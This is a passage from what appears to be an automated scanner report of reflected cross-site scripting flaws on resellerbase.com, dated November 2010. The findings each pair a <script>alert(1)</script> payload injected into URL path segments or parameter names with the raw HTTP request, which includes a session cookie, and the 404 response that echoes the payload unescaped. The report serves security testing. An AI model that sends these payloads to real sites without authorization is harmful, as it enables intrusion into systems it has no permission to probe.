<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8f70<script>alert(1)</script>45631db7b5e/7/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3588. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85ad6<script>alert(1)</script>0fece11e306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/785ad6<script>alert(1)</script>0fece11e306/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/785ad6<script>alert(1)</script>0fece11e306/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3589. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 89889<script>alert(1)</script>c63b036d845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes89889<script>alert(1)</script>c63b036d845/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes89889<script>alert(1)</script>c63b036d845/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3590. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb559<script>alert(1)</script>115b85c28d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosfb559<script>alert(1)</script>115b85c28d1/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosfb559<script>alert(1)</script>115b85c28d1/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3591. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa07c<script>alert(1)</script>a543b0e9065 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/imagesfa07c<script>alert(1)</script>a543b0e9065/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/imagesfa07c<script>alert(1)</script>a543b0e9065/rating/ was not found on this server.</p>
...[SNIP]...

2.3592. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6b775<script>alert(1)</script>7610d876f51 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating6b775<script>alert(1)</script>7610d876f51/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating6b775<script>alert(1)</script>7610d876f51/ was not found on this server.</p>
...[SNIP]...

2.3593. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3943f<script>alert(1)</script>12a5bcbd370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/?3943f<script>alert(1)</script>12a5bcbd370=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/?3943f<script>alert(1)</script>12a5bcbd370=1 was not found on this server.</p>
...[SNIP]...

2.3594. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21c19<script>alert(1)</script>162f0f9c13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail21c19<script>alert(1)</script>162f0f9c13b/7/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail21c19<script>alert(1)</script>162f0f9c13b/7/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3595. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 727e6<script>alert(1)</script>70267e48f2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7727e6<script>alert(1)</script>70267e48f2c/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7727e6<script>alert(1)</script>70267e48f2c/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3596. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2ef6<script>alert(1)</script>df53e795b3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesb2ef6<script>alert(1)</script>df53e795b3d/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesb2ef6<script>alert(1)</script>df53e795b3d/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3597. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6d90<script>alert(1)</script>87186e0267d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmose6d90<script>alert(1)</script>87186e0267d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmose6d90<script>alert(1)</script>87186e0267d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3598. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7462<script>alert(1)</script>46fcdcf0b72 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/imagesf7462<script>alert(1)</script>46fcdcf0b72/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/imagesf7462<script>alert(1)</script>46fcdcf0b72/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3599. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 29901<script>alert(1)</script>eb4caa46598 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating29901<script>alert(1)</script>eb4caa46598/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating29901<script>alert(1)</script>eb4caa46598/4half.gif was not found on this server.</p>
...[SNIP]...

2.3600. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload de841<script>alert(1)</script>d5273994736 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/4half.gifde841<script>alert(1)</script>d5273994736 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/4half.gifde841<script>alert(1)</script>d5273994736 was not found on this server.</p>
...[SNIP]...

2.3601. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef8d2<script>alert(1)</script>9c01a5eec39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/rating/4half.gif?ef8d2<script>alert(1)</script>9c01a5eec39=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/rating/4half.gif?ef8d2<script>alert(1)</script>9c01a5eec39=1 was not found on this server.</p>
...[SNIP]...

2.3602. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90890<script>alert(1)</script>85feaab47b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail90890<script>alert(1)</script>85feaab47b3/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail90890<script>alert(1)</script>85feaab47b3/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3603. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc142<script>alert(1)</script>6599043bb38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7dc142<script>alert(1)</script>6599043bb38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7dc142<script>alert(1)</script>6599043bb38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3604. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3b3c<script>alert(1)</script>5d51d85f507 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesd3b3c<script>alert(1)</script>5d51d85f507/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesd3b3c<script>alert(1)</script>5d51d85f507/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3605. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7dbc6<script>alert(1)</script>86e4e2e3c0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos7dbc6<script>alert(1)</script>86e4e2e3c0a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos7dbc6<script>alert(1)</script>86e4e2e3c0a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3606. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 42b3b<script>alert(1)</script>16497a3c6a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images42b3b<script>alert(1)</script>16497a3c6a5/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
